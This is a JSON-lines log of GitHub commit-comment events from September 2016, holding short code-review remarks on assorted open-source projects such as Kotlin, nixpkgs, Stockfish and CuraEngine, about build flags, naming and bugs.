{"id":"4520747060","type":"CommitCommentEvent","actor":{"login":"nigelmegitt"},"repo":{"name":"ebu/ebu-tt-live-toolkit"},"payload":{"comment":{"id":18909515,"position":47,"line":30,"path":"testing/bdd/features/timing/document_splicing.feature","commit_id":"e52b55a03c51b22025e3972dddbf5c5fc8992e4d","created_at":"2016-09-06T11:30:36Z","updated_at":"2016-09-06T11:30:36Z","body":"I think this is wrong? Looks like doc 2 completely supersedes doc 1 looking at their availability times and begin times, so the output should have `bar` in it not `foo`? The segment times look odd too."}},"created_at":"2016-09-06T11:30:36Z"}
{"id":"4520750895","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"locutus2/Stockfish"},"payload":{"comment":{"id":18909522,"position":null,"line":null,"path":null,"commit_id":"710470883f105b8323b13f010c731e54a4580b08","created_at":"2016-09-06T11:31:27Z","updated_at":"2016-09-06T11:31:27Z","body":"This makes sense, although maybe we should not count isolated pawns that are already penalized (or just decrease their penalty)! (And might perhaps be complementary to some properly tuned endgame bonus for sliders if it's true that they're neutral for knights...?)"}},"created_at":"2016-09-06T11:31:27Z"}
{"id":"4520755845","type":"CommitCommentEvent","actor":{"login":"peeb"},"repo":{"name":"akvo/akvo-reflow"},"payload":{"comment":{"id":18909530,"position":12,"line":12,"path":"Dockerfile","commit_id":"eaa85cddc108873c0638a50b40b0560daf44e08b","created_at":"2016-09-06T11:32:38Z","updated_at":"2016-09-06T11:32:38Z","body":"Agreed. I've modified this."}},"created_at":"2016-09-06T11:32:38Z"}
{"id":"4520760426","type":"CommitCommentEvent","actor":{"login":"tcbrindle"},"repo":{"name":"tahonermann/text_view"},"payload":{"comment":{"id":18909536,"position":26,"line":24,"path":"CMakeLists.txt","commit_id":"d0f03e5c9ca48716fdff9244f4649410966eb1aa","created_at":"2016-09-06T11:33:43Z","updated_at":"2016-09-06T11:33:43Z","body":"Again, `-O2` and `-DNDEBUG` (and equivalent on Windows) are the defaults for Release and RelWithDebugInfo modes, so this is redundant. (It might be worth specifying `-Og` for  the RELWITHDEBINFO mode with GCC, however.)"}},"created_at":"2016-09-06T11:33:43Z"}
{"id":"4520764111","type":"CommitCommentEvent","actor":{"login":"cursey"},"repo":{"name":"cursey/kanan"},"payload":{"comment":{"id":18909549,"position":null,"line":null,"path":null,"commit_id":"756fd9e195dca426ba2fc4629b19ea2cfabc201d","created_at":"2016-09-06T11:34:37Z","updated_at":"2016-09-06T11:34:37Z","body":"Yeah disabling `TcpAckFrequency` is going to further improve the speed, but is not something I can set via socket options."}},"created_at":"2016-09-06T11:34:37Z"}
{"id":"4520767428","type":"CommitCommentEvent","actor":{"login":"larryhudson"},"repo":{"name":"larryhudson/lectureDL"},"payload":{"comment":{"id":18909558,"position":null,"line":null,"path":null,"commit_id":"95e48550ec3efc45821da64e009ee8160b1507a1","created_at":"2016-09-06T11:35:25Z","updated_at":"2016-09-06T11:35:25Z","body":"Included Linux, Mac and Windows executables in the 'ChromeDriver' folder. Now it uses platform.system() to determine the OS and sets the Chromedriver executable accordingly. "}},"created_at":"2016-09-06T11:35:25Z"}
{"id":"4520767548","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":18909559,"position":49,"line":580,"path":"src/Wireframe2gcode.cpp","commit_id":"492bf72ffdbd4e836bdb9b899e9ee3de05bd4dfb","created_at":"2016-09-06T11:35:27Z","updated_at":"2016-09-06T11:35:27Z","body":"Just tested this and this comment is still getting written to the file. It's probably in the header somewhere. So this is not a bug. Sorry."}},"created_at":"2016-09-06T11:35:27Z"}
{"id":"4520770214","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/design-system"},"payload":{"comment":{"id":18909562,"position":null,"line":null,"path":null,"commit_id":"c0979b5b1774fcc893a3b1db7696666ec6a396c6","created_at":"2016-09-06T11:35:59Z","updated_at":"2016-09-06T11:35:59Z","body":"Visual Regression Testing found a difference between new version and the baseline.\nCheck the diffs [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-pr-check/404/).\nAccept the new baseline [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-update-baseline/parambuild?branch=XW-1928)."}},"created_at":"2016-09-06T11:35:59Z"}
{"id":"4520773399","type":"CommitCommentEvent","actor":{"login":"copumpkin"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18909569,"position":null,"line":null,"path":null,"commit_id":"0aa75206705afc71b991cceeede644c87088d583","created_at":"2016-09-06T11:36:45Z","updated_at":"2016-09-06T11:36:45Z","body":"I honestly wish we'd go in the other direction here, and remove things from the global system path replacing them with more precise links in scripts."}},"created_at":"2016-09-06T11:36:45Z"}
{"id":"4520776191","type":"CommitCommentEvent","actor":{"login":"Poshwosh"},"repo":{"name":"cursey/kanan"},"payload":{"comment":{"id":18909576,"position":null,"line":null,"path":null,"commit_id":"756fd9e195dca426ba2fc4629b19ea2cfabc201d","created_at":"2016-09-06T11:37:26Z","updated_at":"2016-09-06T11:37:26Z","body":"Well with that in mind I guess we can say, you did it! :yum: \r\nI'll ask my friend to test it later on today for further confirmation."}},"created_at":"2016-09-06T11:37:26Z"}
{"id":"4520777530","type":"CommitCommentEvent","actor":{"login":"fzurita"},"repo":{"name":"mupen64plus-ae/mupen64plus-ae"},"payload":{"comment":{"id":18909580,"position":null,"line":null,"path":null,"commit_id":"17b3cfbfe236438c529345a7509c3f9af6409a19","created_at":"2016-09-06T11:37:41Z","updated_at":"2016-09-06T11:37:41Z","body":"Nice, thanks!"}},"created_at":"2016-09-06T11:37:41Z"}
{"id":"4520778361","type":"CommitCommentEvent","actor":{"login":"manups4e"},"repo":{"name":"Grarak/android_kernel_oneplus_msm8994"},"payload":{"comment":{"id":18909584,"position":null,"line":null,"path":null,"commit_id":"37ed2e5b12a6d0675999d5d6b4130a9be8115d76","created_at":"2016-09-06T11:37:54Z","updated_at":"2016-09-06T11:37:54Z","body":"make[2]: ***  No rule to make target \"arch/arm/boot/dts/msm8994-v1-mtp_14049_HW_14.dtb\", needed by \"arch/arm64/boot/Image.gz-dtb\".  Stop."}},"created_at":"2016-09-06T11:37:54Z"}
{"id":"4520779450","type":"CommitCommentEvent","actor":{"login":"AvalancheYT"},"repo":{"name":"UnraveledMC-Dev/UnraveledMCMod"},"payload":{"comment":{"id":18909587,"position":null,"line":null,"path":null,"commit_id":"3787853e0b3f51d81421999cb7ee6fb22413b6b5","created_at":"2016-09-06T11:38:11Z","updated_at":"2016-09-06T11:38:11Z","body":"@OxLemonxO, @CreeperSeth has done it on his latest commitment.\r\n"}},"created_at":"2016-09-06T11:38:11Z"}
{"id":"4520781051","type":"CommitCommentEvent","actor":{"login":"fzxdandy"},"repo":{"name":"fzxdandy/test"},"payload":{"comment":{"id":18909593,"position":null,"line":null,"path":null,"commit_id":"031d18b28ae077cc63e333679b35ed47d40a0f8d","created_at":"2016-09-06T11:38:31Z","updated_at":"2016-09-06T11:38:31Z","body":"fzx commit"}},"created_at":"2016-09-06T11:38:31Z"}
{"id":"4520781270","type":"CommitCommentEvent","actor":{"login":"PhilippWendler"},"repo":{"name":"ultimate-pa/smtinterpol"},"payload":{"comment":{"id":18909594,"position":null,"line":null,"path":null,"commit_id":"2aaa315b2355e8fe6f1a19a0c1aa328ea4d7c42b","created_at":"2016-09-06T11:38:35Z","updated_at":"2016-09-06T11:38:35Z","body":"Nice to see, we are glad that we will be able to use global declarations in the future!\r\n\r\nCould you please publish a current version of SMTInterpol to Maven Central? Then we can integrate it and the also the newest LassoRanker."}},"created_at":"2016-09-06T11:38:35Z"}
{"id":"4520786446","type":"CommitCommentEvent","actor":{"login":"cursey"},"repo":{"name":"cursey/kanan"},"payload":{"comment":{"id":18909611,"position":null,"line":null,"path":null,"commit_id":"756fd9e195dca426ba2fc4629b19ea2cfabc201d","created_at":"2016-09-06T11:39:50Z","updated_at":"2016-09-06T11:39:50Z","body":"Neato. I'll wait for another confirmation before closing issue #47."}},"created_at":"2016-09-06T11:39:50Z"}
{"id":"4520787412","type":"CommitCommentEvent","actor":{"login":"edolstra"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18909614,"position":null,"line":null,"path":null,"commit_id":"0aa75206705afc71b991cceeede644c87088d583","created_at":"2016-09-06T11:40:05Z","updated_at":"2016-09-06T11:40:05Z","body":"Ah sorry, I didn't notice that this commit did more than just remove rsync from the system path."}},"created_at":"2016-09-06T11:40:05Z"}
{"id":"4520791674","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/design-system"},"payload":{"comment":{"id":18909632,"position":null,"line":null,"path":null,"commit_id":"6c4290239bee149c65174f7090894bbbe9d446cd","created_at":"2016-09-06T11:41:09Z","updated_at":"2016-09-06T11:41:09Z","body":"Visual Regression Testing found a difference between new version and the baseline.\nCheck the diffs [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-pr-check/405/).\nAccept the new baseline [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-update-baseline/parambuild?branch=XW-1928)."}},"created_at":"2016-09-06T11:41:09Z"}
{"id":"4520791680","type":"CommitCommentEvent","actor":{"login":"slluis"},"repo":{"name":"mono/monodevelop"},"payload":{"comment":{"id":18909633,"position":4,"line":206,"path":"main/src/core/MonoDevelop.Ide/MonoDevelop.Ide.csproj","commit_id":"081123f7b965e260ba3a4c5367a41ae26205781a","created_at":"2016-09-06T11:41:09Z","updated_at":"2016-09-06T11:41:09Z","body":"MonoDevelop.Ide"}},"created_at":"2016-09-06T11:41:09Z"}
{"id":"4520792666","type":"CommitCommentEvent","actor":{"login":"ilya-g"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":18909635,"position":null,"line":null,"path":null,"commit_id":"683b5f315c33370a8357809b5aeb35650a7a44ec","created_at":"2016-09-06T11:41:24Z","updated_at":"2016-09-06T11:41:24Z","body":"@{6fd5ba8e-73b8-442b-b0be-d9ac8e0a218f,Sergey Mashkov} To make concrete lists that are not mutable, such that  `list is MutableList == false`"}},"created_at":"2016-09-06T11:41:24Z"}
{"id":"4520793398","type":"CommitCommentEvent","actor":{"login":"sardarwaqas"},"repo":{"name":"alex011235/FaceSwap"},"payload":{"comment":{"id":18909636,"position":null,"line":null,"path":null,"commit_id":"bbd2d6e05015f4f15a27461770e5778f3c4abf07","created_at":"2016-09-06T11:41:33Z","updated_at":"2016-09-06T11:41:33Z","body":"hi Alex...\r\ni have OpenCV libraries in this project but it gives the error in this line..\r\n/* Load Native Library */\r\n    static {\r\n        if (!OpenCVLoader.initDebug());\r\n       else System.loadLibrary(\"nativefaceswap\")\r\n    }\r\n..............................\r\n else System.loadLibrary(\"nativefaceswap\") error goes on this line.."}},"created_at":"2016-09-06T11:41:33Z"}
{"id":"4520795997","type":"CommitCommentEvent","actor":{"login":"fzurita"},"repo":{"name":"mupen64plus-ae/mupen64plus-ae"},"payload":{"comment":{"id":18909640,"position":null,"line":null,"path":null,"commit_id":"328a5ffec02f686248718de0a070520a30ad8805","created_at":"2016-09-06T11:42:14Z","updated_at":"2016-09-06T11:42:14Z","body":"The only one I found so far is that there is some kind of driver crash causing the core thread to get stuck in a driver call that never returns. In this case even this doesn't work though. Only way top recover is to kill the app.\r\n\r\nThis is really more as a precaution."}},"created_at":"2016-09-06T11:42:14Z"}
{"id":"4520799167","type":"CommitCommentEvent","actor":{"login":"gyrog"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":18909655,"position":null,"line":null,"path":null,"commit_id":"4899eab685b79e33e7a1fe00ca5a260d54e4ea7f","created_at":"2016-09-06T11:43:00Z","updated_at":"2016-09-06T11:43:00Z","body":"Please NEVER ATTRIBUTE CODE TO ME THAT IS NOT MINE.\r\n\r\n"}},"created_at":"2016-09-06T11:43:00Z"}
{"id":"4520799845","type":"CommitCommentEvent","actor":{"login":"tcbrindle"},"repo":{"name":"tahonermann/text_view"},"payload":{"comment":{"id":18909657,"position":15,"line":15,"path":"cmake/Modules/FindCMCSTL2.cmake","commit_id":"d0f03e5c9ca48716fdff9244f4649410966eb1aa","created_at":"2016-09-06T11:43:11Z","updated_at":"2016-09-06T11:43:11Z","body":"Could I suggest changing this (back) to `CMCSTL2_INCLUDE_DIR`?\r\n\r\nThe names `XXX_INCLUDE_DIR` and `XXX_LIBRARY_DIR` seem to be relatively standard for CMake (see [FindBoost.cmake](https://cmake.org/cmake/help/v3.0/module/FindBoost.html) for example), and if STL2 requires linking to a library in future then this would allow the header and library paths to be specified separately.\r\n\r\nAlso, the name `CMCSTL2_INSTALL_PATH` might imply that it's necessary to install STL2 somewhere -- this is presently not the case, it works fine just pointing to the `include/` directory of a Git checkout."}},"created_at":"2016-09-06T11:43:11Z"}
{"id":"4520802551","type":"CommitCommentEvent","actor":{"login":"Therzok"},"repo":{"name":"mono/monodevelop"},"payload":{"comment":{"id":18909661,"position":4,"line":206,"path":"main/src/core/MonoDevelop.Ide/MonoDevelop.Ide.csproj","commit_id":"081123f7b965e260ba3a4c5367a41ae26205781a","created_at":"2016-09-06T11:43:50Z","updated_at":"2016-09-06T11:43:50Z","body":"Oh, yeah, right. For a second I thought this would turn off local copying..."}},"created_at":"2016-09-06T11:43:50Z"}
{"id":"4520804837","type":"CommitCommentEvent","actor":{"login":"siddontang"},"repo":{"name":"pingcap/pd"},"payload":{"comment":{"id":18909665,"position":null,"line":null,"path":null,"commit_id":"0cb18cc58b33b6cca2aa9e0f195b8ea7d2a78a49","created_at":"2016-09-06T11:44:23Z","updated_at":"2016-09-06T11:44:23Z","body":"LGTM"}},"created_at":"2016-09-06T11:44:23Z"}
{"id":"4520805238","type":"CommitCommentEvent","actor":{"login":"pmoulon"},"repo":{"name":"stephane-lb/openMVG"},"payload":{"comment":{"id":18909670,"position":41,"line":719,"path":"src/openMVG/sfm/sfm_data_BA_ceres_camera_functor.hpp","commit_id":"57fd7aacb561fe4f180548010a835d003f7edf38","created_at":"2016-09-06T11:44:29Z","updated_at":"2016-09-06T11:44:29Z","body":"You must use the project function https://github.com/stephane-lb/openMVG/blob/develop_spherical_camera/src/openMVG/cameras/Camera_Spherical_test.cpp#L19\r\nuse ceres::atan2 ..."}},"created_at":"2016-09-06T11:44:29Z"}
{"id":"4520810874","type":"CommitCommentEvent","actor":{"login":"lopezloo"},"repo":{"name":"multitheftauto/mtasa-blue"},"payload":{"comment":{"id":18909678,"position":4,"line":1538,"path":"Server/mods/deathmatch/logic/CGame.cpp","commit_id":"e95b136637de95b1ef6f7c705460bab7d125ce93","created_at":"2016-09-06T11:45:54Z","updated_at":"2016-09-06T11:45:54Z","body":"Ultra minor thing, but maybe this line could me moved under player events if possible?"}},"created_at":"2016-09-06T11:45:54Z"}
{"id":"4520811191","type":"CommitCommentEvent","actor":{"login":"gyrog"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":18909679,"position":null,"line":null,"path":null,"commit_id":"4899eab685b79e33e7a1fe00ca5a260d54e4ea7f","created_at":"2016-09-06T11:45:59Z","updated_at":"2016-09-06T11:45:59Z","body":"Please NEVER ATTRIBUTE CODE TO ME THAT IS NOT MINE.\r\n\r\nMy change to frontend_change ws to remmove the sort altogether.\r\nThe list is produced by probepart which definitely, definitely, definitely spits it out in the correct order."}},"created_at":"2016-09-06T11:45:59Z"}
{"id":"4520813918","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/design-system"},"payload":{"comment":{"id":18909687,"position":null,"line":null,"path":null,"commit_id":"93570f29c2096dacc1a154c320208a2311d2e146","created_at":"2016-09-06T11:46:38Z","updated_at":"2016-09-06T11:46:38Z","body":"Visual Regression Testing found a difference between new version and the baseline.\nCheck the diffs [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-pr-check/406/).\nAccept the new baseline [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-update-baseline/parambuild?branch=XW-1928)."}},"created_at":"2016-09-06T11:46:38Z"}
{"id":"4520816352","type":"CommitCommentEvent","actor":{"login":"odzb"},"repo":{"name":"WebReflection/url-search-params"},"payload":{"comment":{"id":18909690,"position":null,"line":null,"path":null,"commit_id":"df50ab50aff8a7d10914f167f5a363dd96cec7ef","created_at":"2016-09-06T11:47:15Z","updated_at":"2016-09-06T11:47:15Z","body":"Can you please release a new version with this change? It is important for some older versions of Microsoft Edge as well."}},"created_at":"2016-09-06T11:47:15Z"}
{"id":"4520816559","type":"CommitCommentEvent","actor":{"login":"tcbrindle"},"repo":{"name":"tahonermann/text_view"},"payload":{"comment":{"id":18909691,"position":24,"line":22,"path":"CMakeLists.txt","commit_id":"d0f03e5c9ca48716fdff9244f4649410966eb1aa","created_at":"2016-09-06T11:47:17Z","updated_at":"2016-09-06T11:47:17Z","body":"Perhaps it would be better to specify `-Werror` only in debug configurations? I've read many complaints when a new compiler version warns about something that an earlier compiler did not, which suddenly leads to a hard build failure. `-Werror` is certainly useful to force you to fix warnings when developing the library, but users (who are most likely to be compiling in release mode) most probably don't want to have to go and fix these."}},"created_at":"2016-09-06T11:47:17Z"}
{"id":"4520816784","type":"CommitCommentEvent","actor":{"login":"henrinie"},"repo":{"name":"hujosh/signbank-feedback"},"payload":{"comment":{"id":18909692,"position":null,"line":null,"path":null,"commit_id":"7959a1f4da000222e3077647e8b30157708f60c3","created_at":"2016-09-06T11:47:20Z","updated_at":"2016-09-06T11:47:20Z","body":"@hujosh if you would like to use objects.filter, you could compare the length like you are doing now.\r\nWith objects.get you could catch the exceptions: https://docs.djangoproject.com/en/1.10/ref/models/querysets/#django.db.models.query.QuerySet.get\r\n\"MultipleObjectsReturned\" and \"DoesNotExist\""}},"created_at":"2016-09-06T11:47:20Z"}
{"id":"4520823430","type":"CommitCommentEvent","actor":{"login":"ajin2"},"repo":{"name":"ajin2/K-Tour"},"payload":{"comment":{"id":18909709,"position":4,"line":24,"path":"app/src/main/java/com/example/hanaj/k_tour/common/MainSearch/MainSearchActivity.java","commit_id":"42fef53c28f3fdaf1cd1e4a13d267afc340b9b90","created_at":"2016-09-06T11:48:59Z","updated_at":"2016-09-06T11:48:59Z","body":"기능 아직 못올림"}},"created_at":"2016-09-06T11:48:59Z"}
{"id":"4520824403","type":"CommitCommentEvent","actor":{"login":"acrm"},"repo":{"name":"EkaSe/HelloWorld"},"payload":{"comment":{"id":18909711,"position":79,"line":0,"path":"syntax.txt","commit_id":"a4e1081f69bdeec0d9761ec1d2222d0fc4b4f918","created_at":"2016-09-06T11:49:16Z","updated_at":"2016-09-06T11:49:16Z","body":"Будем называть это экземпляром класса. "}},"created_at":"2016-09-06T11:49:16Z"}
{"id":"4520829303","type":"CommitCommentEvent","actor":{"login":"acrm"},"repo":{"name":"EkaSe/HelloWorld"},"payload":{"comment":{"id":18909723,"position":79,"line":0,"path":"syntax.txt","commit_id":"a4e1081f69bdeec0d9761ec1d2222d0fc4b4f918","created_at":"2016-09-06T11:50:27Z","updated_at":"2016-09-06T11:50:27Z","body":"Имя переменной лучше писать со строчной буквы, camel-нотация"}},"created_at":"2016-09-06T11:50:27Z"}
{"id":"4520831552","type":"CommitCommentEvent","actor":{"login":"11029358"},"repo":{"name":"11029358/Story.of.my.life"},"payload":{"comment":{"id":18909728,"position":null,"line":null,"path":null,"commit_id":"221f83a2d85c9b077133f5b200e32f9caa8da57d","created_at":"2016-09-06T11:50:59Z","updated_at":"2016-09-06T11:50:59Z","body":"New title"}},"created_at":"2016-09-06T11:50:59Z"}
{"id":"4520833134","type":"CommitCommentEvent","actor":{"login":"ilya-g"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":18909731,"position":9,"line":0,"path":"js/js.libraries/src/core/collections/AbstractList.kt","commit_id":"5de70252213be5975852f4c511f037e1cf629ded","created_at":"2016-09-06T11:51:20Z","updated_at":"2016-09-06T11:51:20Z","body":"We do not perform concurrent modification tracking in JS backend. `modCount` property is a part of public API of AbstractList, so it is exposed for inheritors, but its value is never checked."}},"created_at":"2016-09-06T11:51:20Z"}
{"id":"4520833520","type":"CommitCommentEvent","actor":{"login":"snoyberg"},"repo":{"name":"fpco/stackage-curator"},"payload":{"comment":{"id":18909733,"position":4,"line":4,"path":"ChangeLog.md","commit_id":"67484d7d9e235c2a1ea725131390f19d0f13cde6","created_at":"2016-09-06T11:51:27Z","updated_at":"2016-09-06T11:51:27Z","body":"Correct. The fact is that we don't even have that information for older snapshots."}},"created_at":"2016-09-06T11:51:27Z"}
{"id":"4520834992","type":"CommitCommentEvent","actor":{"login":"udalov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":18909739,"position":25,"line":38,"path":"compiler/backend/src/org/jetbrains/kotlin/codegen/context/InlineLambdaContext.kt","commit_id":"f4a5ce11ffafa76452d061587228b512e23811d6","created_at":"2016-09-06T11:51:49Z","updated_at":"2016-09-06T11:51:49Z","body":"The message of the exception (which is just an assert that is never broken anyway) is now taking 5 lines out of 6 which initialize this property, please simplify"}},"created_at":"2016-09-06T11:51:49Z"}
{"id":"4520835299","type":"CommitCommentEvent","actor":{"login":"acrm"},"repo":{"name":"EkaSe/HelloWorld"},"payload":{"comment":{"id":18909741,"position":80,"line":0,"path":"syntax.txt","commit_id":"a4e1081f69bdeec0d9761ec1d2222d0fc4b4f918","created_at":"2016-09-06T11:51:55Z","updated_at":"2016-09-06T11:51:55Z","body":"Важное уточнение: обращение к методу *экземпляра* класса. Обращение к методу *класса* выглядит иначе. "}},"created_at":"2016-09-06T11:51:55Z"}
{"id":"4520838846","type":"CommitCommentEvent","actor":{"login":"acrm"},"repo":{"name":"EkaSe/HelloWorld"},"payload":{"comment":{"id":18909751,"position":88,"line":0,"path":"syntax.txt","commit_id":"a4e1081f69bdeec0d9761ec1d2222d0fc4b4f918","created_at":"2016-09-06T11:52:45Z","updated_at":"2016-09-06T11:52:45Z","body":"Импорт пространства имён)"}},"created_at":"2016-09-06T11:52:45Z"}
{"id":"4520845065","type":"CommitCommentEvent","actor":{"login":"udalov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":18909771,"position":90,"line":770,"path":"compiler/backend/src/org/jetbrains/kotlin/codegen/inline/InlineCodegen.java","commit_id":"f4a5ce11ffafa76452d061587228b512e23811d6","created_at":"2016-09-06T11:54:14Z","updated_at":"2016-09-06T11:54:14Z","body":"Why is this check needed now?"}},"created_at":"2016-09-06T11:54:14Z"}
{"id":"4520847341","type":"CommitCommentEvent","actor":{"login":"vnjp"},"repo":{"name":"vnjp/lab1"},"payload":{"comment":{"id":18909780,"position":null,"line":null,"path":null,"commit_id":"c082049edc27b4708c5fa1b66de809f287962366","created_at":"2016-09-06T11:54:47Z","updated_at":"2016-09-06T11:54:47Z","body":"https://git-scm.com/book/ru/v1/%D0%92%D0%B2%D0%B5%D0%B4%D0%B5%D0%BD%D0%B8%D0%B5-%D0%9E%D1%81%D0%BD%D0%BE%D0%B2%D1%8B-Git"}},"created_at":"2016-09-06T11:54:47Z"}
{"id":"4520847383","type":"CommitCommentEvent","actor":{"login":"subfuzion"},"repo":{"name":"appcelerator/amp"},"payload":{"comment":{"id":18909781,"position":26,"line":290,"path":"swarm","commit_id":"69c249b593ba204be70da092bc65c6e657b3494f","created_at":"2016-09-06T11:54:47Z","updated_at":"2016-09-06T11:54:47Z","body":"@bertrand-quenin Should this also be removed? (And where is the PR?) ;)"}},"created_at":"2016-09-06T11:54:47Z"}
{"id":"4520847773","type":"CommitCommentEvent","actor":{"login":"andrei14vl"},"repo":{"name":"CUBRID/cubrid"},"payload":{"comment":{"id":18909782,"position":7,"line":16002,"path":"src/storage/heap_file.c","commit_id":"7d2dabfbca1ce0f7f905e0a78907fb15cbec8777","created_at":"2016-09-06T11:54:53Z","updated_at":"2016-09-06T11:54:53Z","body":"Now you can remove also the initialization of DEL_ID."}},"created_at":"2016-09-06T11:54:53Z"}
{"id":"4520851096","type":"CommitCommentEvent","actor":{"login":"WebReflection"},"repo":{"name":"WebReflection/url-search-params"},"payload":{"comment":{"id":18909788,"position":null,"line":null,"path":null,"commit_id":"df50ab50aff8a7d10914f167f5a363dd96cec7ef","created_at":"2016-09-06T11:55:41Z","updated_at":"2016-09-06T11:55:41Z","body":"Apologies I completely forgot to publish, it's updated now."}},"created_at":"2016-09-06T11:55:41Z"}
{"id":"4520853023","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/cura-build-environment"},"payload":{"comment":{"id":18909795,"position":20,"line":20,"path":"projects/numpy.cmake","commit_id":"5762b5ef54f2e6bba13cae99616ce1e29be57d65","created_at":"2016-09-06T11:56:10Z","updated_at":"2016-09-06T11:56:10Z","body":"As this gzip file is not signed, how do we verify authenticity on Numpy?"}},"created_at":"2016-09-06T11:56:10Z"}
{"id":"4520857289","type":"CommitCommentEvent","actor":{"login":"Rashed97"},"repo":{"name":"Rashed97/android_hardware_qcom_audio"},"payload":{"comment":{"id":18909804,"position":4,"line":76,"path":"hal/audio_hw.c","commit_id":"a9eeb02072176977d81b3958976cd6fb9722505b","created_at":"2016-09-06T11:57:07Z","updated_at":"2016-09-06T11:57:07Z","body":"Smh..."}},"created_at":"2016-09-06T11:57:07Z"}
{"id":"4520857465","type":"CommitCommentEvent","actor":{"login":"j-moeller"},"repo":{"name":"laco0416/angular2-component-outlet"},"payload":{"comment":{"id":18909805,"position":46,"line":84,"path":"src/component-outlet.ts","commit_id":"d33e8ee730adfb8f58f339422435dac2e2641490","created_at":"2016-09-06T11:57:09Z","updated_at":"2016-09-06T11:57:09Z","body":"When using the same component twice, the same component is pushed to moduleMeta.declarations twice, because moduleMeta is the same for every ComponentOutlet i.e. injected as COMPONENT_OUTLET_MODULE, thus raising #5 "}},"created_at":"2016-09-06T11:57:09Z"}
{"id":"4520858868","type":"CommitCommentEvent","actor":{"login":"ilya-g"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":18909807,"position":106,"line":0,"path":"js/js.libraries/src/core/collections/HashMap.kt","commit_id":"2a6e43c2255e3942ea67d05643ad0171e8098fad","created_at":"2016-09-06T11:57:27Z","updated_at":"2016-09-06T11:57:27Z","body":"yes, it can be :+1:"}},"created_at":"2016-09-06T11:57:27Z"}
{"id":"4520859954","type":"CommitCommentEvent","actor":{"login":"EyalLavi"},"repo":{"name":"ebu/ebu-tt-live-toolkit"},"payload":{"comment":{"id":18909810,"position":47,"line":30,"path":"testing/bdd/features/timing/document_splicing.feature","commit_id":"e52b55a03c51b22025e3972dddbf5c5fc8992e4d","created_at":"2016-09-06T11:57:43Z","updated_at":"2016-09-06T11:57:43Z","body":"The documents are identical except for the sequence number. Doc 1 (foo) has a higher sequence number so won't it supersede doc 2? "}},"created_at":"2016-09-06T11:57:43Z"}
{"id":"4520861874","type":"CommitCommentEvent","actor":{"login":"vnjp"},"repo":{"name":"vnjp/lab1"},"payload":{"comment":{"id":18909812,"position":null,"line":null,"path":null,"commit_id":"c082049edc27b4708c5fa1b66de809f287962366","created_at":"2016-09-06T11:58:11Z","updated_at":"2016-09-06T11:58:11Z","body":"https://git-for-windows.github.io//"}},"created_at":"2016-09-06T11:58:11Z"}
{"id":"4520862139","type":"CommitCommentEvent","actor":{"login":"hkaiser"},"repo":{"name":"STEllAR-GROUP/hpx"},"payload":{"comment":{"id":18909813,"position":null,"line":null,"path":null,"commit_id":"948291e4e796e3331f430e1d888486fce96cbe3e","created_at":"2016-09-06T11:58:14Z","updated_at":"2016-09-06T11:58:14Z","body":"Which suspension is triggering this problem?"}},"created_at":"2016-09-06T11:58:14Z"}
{"id":"4520867370","type":"CommitCommentEvent","actor":{"login":"ajin2"},"repo":{"name":"ajin2/K-Tour"},"payload":{"comment":{"id":18909827,"position":20,"line":75,"path":"app/src/main/java/com/example/hanaj/k_tour/common/MainSearch/MainSearchActivity.java","commit_id":"42fef53c28f3fdaf1cd1e4a13d267afc340b9b90","created_at":"2016-09-06T11:59:29Z","updated_at":"2016-09-06T11:59:29Z","body":"땡큐 이거 좀 자세히 봐야겠음"}},"created_at":"2016-09-06T11:59:29Z"}
{"id":"4520867575","type":"CommitCommentEvent","actor":{"login":"ilya-g"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":18909828,"position":null,"line":null,"path":null,"commit_id":"fc89d6edd9d0ddc0fd035a47c62a060fb94a55d7","created_at":"2016-09-06T11:59:32Z","updated_at":"2016-09-06T11:59:32Z","body":"|`js/js.libraries/src/core/collections/LinkedHashMap.kt:55`|\n|---|\nSome check is required anyway, since `head` is a mutable property, either `checkNotNull` or `!!`."}},"created_at":"2016-09-06T11:59:32Z"}
{"id":"4520883628","type":"CommitCommentEvent","actor":{"login":"jakolehm"},"repo":{"name":"kontena/kontena"},"payload":{"comment":{"id":18909881,"position":17,"line":29,"path":"server/app/models/authorization_request.rb","commit_id":"554bfbaa919043ba7fa7ed221b052e893421fefb","created_at":"2016-09-06T12:03:20Z","updated_at":"2016-09-06T12:03:20Z","body":"If ttl is so small why don't we just remove object directly?"}},"created_at":"2016-09-06T12:03:20Z"}
{"id":"4520884532","type":"CommitCommentEvent","actor":{"login":"mrn0p3c"},"repo":{"name":"maierfelix/POGOserver"},"payload":{"comment":{"id":18909883,"position":null,"line":null,"path":null,"commit_id":"2de38e5568de9f29c1e2f175ba92971308c20f78","created_at":"2016-09-06T12:03:33Z","updated_at":"2016-09-06T12:03:33Z","body":"@Sillyblower  thanks brother :)"}},"created_at":"2016-09-06T12:03:33Z"}
